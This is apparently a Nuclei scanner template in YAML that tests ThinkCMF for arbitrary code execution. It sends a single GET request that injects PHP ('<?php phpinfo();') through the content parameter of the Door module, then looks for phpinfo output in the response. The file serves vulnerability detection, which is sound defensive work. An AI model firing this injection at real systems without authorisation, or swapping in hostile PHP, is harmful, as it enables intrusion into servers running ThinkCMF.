nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-exe...

28 lines
570 B
YAML

id: thinkcmf-arbitrary-code-execution
info:
name: ThinkCMF Arbitrary code execution
author: pikpikcu
severity: high
reference: https://www.shuzhiduo.com/A/l1dygr36Je/
tags: thinkcmf
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "PHP License"
- "PHP Variables"
condition: and
- type: status
status:
- 200